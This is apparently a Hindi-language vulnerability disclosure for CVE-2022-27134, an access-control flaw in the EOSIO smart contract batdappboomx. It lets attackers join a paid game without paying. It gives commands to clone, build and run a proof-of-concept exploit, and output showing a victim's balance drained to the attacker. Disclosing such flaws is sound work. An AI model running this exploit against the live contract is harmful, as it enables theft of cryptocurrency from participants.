
CVE-2022-27134
CVE-2022-27134
batdappboomx EOSIO ब्लॉकचेन पर चलने वाला एक सार्वजनिक स्मार्ट कॉन्ट्रैक्ट है। यह स्मार्ट कॉन्ट्रैक्ट अपने प्रतिभागियों को क्रिप्टोकरेंसी पुरस्कृत करता है, यदि वे पहले कुछ क्रिप्टोकरेंसी का भुगतान करते हैं।
इस स्मार्ट कॉन्ट्रैक्ट का नवीनतम संस्करण। स्मार्ट कॉन्ट्रैक्ट का sha256 हैश कोड 1327c04cf4b56183eddb1a897bbebf5a873d3421272b708829a4ed0765bef820 है। इसे ब्लॉकचेन एक्सप्लोरर https://bloks.io/account/batdappboomx पर देखें।
अभिगम नियंत्रण भेद्यता
batdappboomx ओपन-सोर्स नहीं है, लेकिन हमें WASAI के साथ एक भेद्यता मिली। हमलावर बिना कुछ भुगतान किए इस गेम में शामिल हो सकते हैं।
git clone https://github.com/Kenun99/CVE-batdappboomx.git && cd CVE-batdappboomx
docker build -t localhost/client-eos:eos .
docker run --rm --network host -it localhost/client-eos:eos
EOSinfo 2022-03-11T14:28:53.345 keosd wallet_plugin.cpp:38 plugin_initialize ]
...
warn 2022-03-11T14:28:53.355 keosd wallet.cpp:218 save_wallet_file ] saving wallet to file /root/eosio-wallet/./default.wallet
Creating wallet: default
Save password to use in the future to unlock this wallet.
Without password imported keys will not be retrievable.
saving password to /root/passwd
imported private key for: EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV
[+] victim's balance: 100.00 -> 0.00
[+] attacker's balance: 10000000.00 10000100.00
[+] Attacked successfully. Got more cryptocurrency.